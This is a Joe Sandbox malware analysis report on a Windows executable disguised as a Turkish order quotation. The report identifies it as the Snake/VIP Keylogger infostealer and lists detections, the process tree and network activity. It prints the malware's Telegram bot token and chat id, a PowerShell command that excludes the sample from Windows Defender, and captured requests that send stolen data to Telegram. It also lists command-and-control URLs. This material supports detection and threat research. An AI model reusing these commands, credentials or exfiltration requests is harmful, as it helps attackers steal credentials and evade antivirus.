Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe

Overview

General Information

Sample name:fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
renamed because original name is a hash value
Original sample name:fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Siparii jpeg docx .exe
Analysis ID:1586917
MD5:1579f7d1a5af2d811a9ade177ca3ed73
SHA1:e126dbb23a1c841a934e5b73bcfebc1c28bd906d
SHA256:1d35d406169afe6bed77759d2e8e03c858897a7e181e3a83bb013f16c91af4bd
Tags:exeSnakeKeyloggeruser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe (PID: 320 cmdline: "C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe" MD5: 1579F7D1A5AF2D811A9ADE177CA3ED73)
    • powershell.exe (PID: 4540 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 7200 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 320 -s 1832 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat id": "-4732682041", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat_id": "-4732682041", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2d03b:$a1: get_encryptedPassword
        • 0x2d350:$a2: get_encryptedUsername
        • 0x2ce4b:$a3: get_timePasswordChanged
        • 0x2cf54:$a4: get_passwordField
        • 0x2d051:$a5: set_encryptedPassword
        • 0x2e6f7:$a7: get_logins
        • 0x2e65a:$a10: KeyLoggerEventArgs
        • 0x2e2bf:$a11: KeyLoggerEventArgsEventHandler
        00000005.00000002.3710704930.0000000002F9A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
          Click to see the 14 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          5.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            5.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              5.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                5.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  5.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2d23b:$a1: get_encryptedPassword
                  • 0x2d550:$a2: get_encryptedUsername
                  • 0x2d04b:$a3: get_timePasswordChanged
                  • 0x2d154:$a4: get_passwordField
                  • 0x2d251:$a5: set_encryptedPassword
                  • 0x2e8f7:$a7: get_logins
                  • 0x2e85a:$a10: KeyLoggerEventArgs
                  • 0x2e4bf:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 26 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe", ParentImage: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, ParentProcessId: 320, ParentProcessName: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe", ProcessId: 4540, ProcessName: powershell.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe", ParentImage: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, ParentProcessId: 320, ParentProcessName: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe", ProcessId: 4540, ProcessName: powershell.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe", ParentImage: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, ParentProcessId: 320, ParentProcessName: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe", ProcessId: 4540, ProcessName: powershell.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-09T19:01:10.974086+010028033053Unknown Traffic192.168.2.749706104.21.112.1443TCP
                  2025-01-09T19:01:16.259787+010028033053Unknown Traffic192.168.2.749717104.21.112.1443TCP
                  2025-01-09T19:01:19.226865+010028033053Unknown Traffic192.168.2.749732104.21.112.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-09T19:01:08.878234+010028032742Potentially Bad Traffic192.168.2.749701132.226.8.16980TCP
                  2025-01-09T19:01:10.346958+010028032742Potentially Bad Traffic192.168.2.749701132.226.8.16980TCP
                  2025-01-09T19:01:12.315945+010028032742Potentially Bad Traffic192.168.2.749710132.226.8.16980TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-09T19:01:30.229729+010018100081Potentially Bad Traffic192.168.2.749804149.154.167.220443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-09T19:01:23.325700+010018100071Potentially Bad Traffic192.168.2.749757149.154.167.220443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: http://anotherarmy.dns.army:8081Avira URL Cloud: Label: phishing
                  Source: http://aborters.duckdns.org:8081Avira URL Cloud: Label: phishing
                  Source: http://varders.kozow.com:8081Avira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat_id": "-4732682041", "Version": "4.4"}
                  Source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.355a768.4.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat id": "-4732682041", "Version": "4.4"}
                  Multi AV Scanner detection for submitted file
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeReversingLabs: Detection: 71%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49704 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49757 version: TLS 1.2
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: System.Windows.Forms.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.Xml.ni.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: Accessibility.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: mscorlib.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.ni.pdbRSDS source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.Drawing.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: mscorlib.ni.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.Core.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.pdb4 source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.Configuration.ni.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: Accessibility.pdbar source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.Configuration.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.Configuration.pdbp source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.Xml.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.ni.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.Core.ni.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: Microsoft.VisualBasic.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 012FF475h5_2_012FF2D8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 012FF475h5_2_012FF4C4
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 012FFC31h5_2_012FF979

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49757 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49804 -> 149.154.167.220:443
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 5.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.359d188.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.355a768.4.raw.unpack, type: UNPACKEDPE
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2010/01/2025%20/%2004:43:02%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U/sendDocument?chat_id=-4732682041&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd31a0fcea8a14Host: api.telegram.orgContent-Length: 585
                  Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49710 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49701 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49706 -> 104.21.112.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49717 -> 104.21.112.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49732 -> 104.21.112.1:443
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49704 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2010/01/2025%20/%2004:43:02%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: unknownHTTP traffic detected: POST /bot7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U/sendDocument?chat_id=-4732682041&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd31a0fcea8a14Host: api.telegram.orgContent-Length: 585
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 18:01:23 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000005.00000002.3710704930.0000000002F9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
